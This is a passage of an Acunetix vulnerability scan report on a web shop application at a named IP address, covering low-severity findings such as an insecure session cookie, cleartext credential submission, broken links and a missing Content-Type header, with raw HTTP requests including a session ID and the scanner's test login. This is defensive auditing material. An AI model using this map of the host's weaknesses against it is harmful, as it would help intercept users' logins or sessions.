<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:50px">
<td colspan="19" class="s13">This session cookie doesn't have the Secure flag set. When a cookie is set with the Secure flag, it instructs the browser that the cookie can only be accessed over secure SSL channels. This is an important security protection for session cookies.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:13px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">33</td>
</tr>
</table>
<a name="PageN34"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">None</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">If possible, you should set the Secure flag for this cookie.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">Cookie name: &quot;JSESSIONID&quot; <br>Cookie domain: &quot;134.154.14.153&quot;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43">GET / HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">Cookie name: &quot;JSESSIONID&quot; <br>Cookie domain: &quot;134.154.14.153&quot;</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43">GET / HTTP/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">User credentials are sent in clear text</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img28.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Low</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">User credentials are not encrypted when they are transmitted.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/validateUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">It seemes that user credentials are sent to /yuliana/user/validation/j_security_check in clear text.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:113px">
<td colspan="19" class="s43">GET /yuliana/user/validation/validateUser HTTP/1.1<br>Host: 134.154.14.153:8080<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Connection: Keep-alive</td>
</tr>
<tr style="height:13px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">34</td>
</tr>
</table>
<a name="PageN35"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:128px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Pragma: No-cache<br>Cache-Control: no-cache<br>Expires: Wed, 31 Dec 1969 16:00:00 PST<br>Content-Type: text/html<br>Content-Length: 7302<br>Date: Sun, 26 Feb 2012 03:14:04 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Broken links</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img29.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Problems navigating the site.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Remove the links to this file or make it accessible.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/error</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/error/ HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/error/<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:19:23 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/test</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:59px">
<td colspan="19" class="s43">GET /yuliana/test/ HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">35</td>
</tr>
</table>
<a name="PageN36"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:135px">
<td colspan="19" class="s43">Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/test/<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:19:23 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/j_security_check</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:187px">
<td colspan="19" class="s43">GET /yuliana/user/validation/j_security_check HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/validateUser<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/validation/j_security_check<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:04 GMT<br>Content-Length: 7045</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/user/validation/j_security_check (db746a20fd171d2e9bd5e94536a82782)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:23px">
<td colspan="19" class="s13">No details are available.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/user/validation/j_security_check HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Referer: http://134.154.14.153:8080/yuliana/user/validation/validateUser<br>Content-Length: 39<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>j_password=acUn3t1x&amp;j_username=jqdvwphq</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:24px">
<td colspan="19" class="s43">HTTP/1.1 404 /yuliana/user/validation/j_security_check</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">36</td>
</tr>
</table>
<a name="PageN37"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:61px">
<td colspan="19" class="s43">Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:05 GMT</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Content type is not specified</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img30.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Crawler</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:35px">
<td colspan="19" class="s13">This page doesn't set a Content-Type header value. This value informs the browser what kind of data to expect. If this header is missing, the browser may incorrectly handle the data. This could lead to security problems.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">None</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Set a Content-Type header value for this page.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Affected items</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/favicon.ico</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s13"><br>HTTP/1.1 200 OK: Apache-Coyote/1.1: W/&quot;21630-1201592374000&quot;Modified: Tue, 29 Jan 2008 07:39:34 GMTLength: 21630: Sun, 26 Feb 2012 03:14:05 GMT<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:172px">
<td colspan="19" class="s43">GET /favicon.ico HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:98px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>ETag: W/&quot;21630-1201592374000&quot;<br>Last-Modified: Tue, 29 Jan 2008 07:39:34 GMT<br>Content-Length: 21630<br>Date: Sun, 26 Feb 2012 03:14:05 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/cart/removeCartItem</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:67px">
<td colspan="19" class="s13"><br>HTTP/1.1 200 OK: Apache-Coyote/1.1Length: 3: Sun, 26 Feb 2012 03:14:14 GMT<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:43px">
<td colspan="19" class="s43">GET /yuliana/cart/removeCartItem?productCode=8601 HTTP/1.1<br>Pragma: no-cache</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">37</td>
</tr>
</table>
<a name="PageN38"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:135px">
<td colspan="19" class="s43">Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 3<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/cart/setQuantity</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:67px">
<td colspan="19" class="s13"><br>HTTP/1.1 200 OK: Apache-Coyote/1.1Length: 3: Sun, 26 Feb 2012 03:14:14 GMT<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:172px">
<td colspan="19" class="s43">GET /yuliana/cart/setQuantity?productCode=pf01&amp;quantity=1 HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:68px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 3<br>Date: Sun, 26 Feb 2012 03:14:14 GMT</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/email/addToEmailList</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:67px">
<td colspan="19" class="s13"><br>HTTP/1.1 200 OK: Apache-Coyote/1.1Length: 160: Sun, 26 Feb 2012 03:14:18 GMT<br></td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:172px">
<td colspan="19" class="s43">GET /yuliana/email/addToEmailList?firstName=&amp;lastName=&amp;emailAddress= HTTP/1.1<br>Pragma: no-cache<br>Acunetix-Aspect: enabled<br>Acunetix-Aspect-Password: *****<br>Acunetix-Aspect-Queries: filelist;aspectalerts<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:58px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Length: 160</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">38</td>
</tr>
</table>
<a name="PageN39"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:15px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:5px">
<td/><td/><td/><td colspan="16" rowspan="2" class="s35">Email address found</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img31.jpg" width="24" height="24" alt=""></td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s45" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="6" class="s37">Severity</td><td colspan="13" class="s36">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Type</td><td colspan="13" class="s58">Informational</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s57">Reported by module</td><td colspan="13" class="s58">Scripting (Invalid_Page_Text_Search.script)</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Description</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:66px">
<td colspan="19" class="s13">One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found.</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Impact</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Email addresses posted on Web sites may attract spam.</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s40">Recommendation</td>
</tr>
<tr style="height:7px">
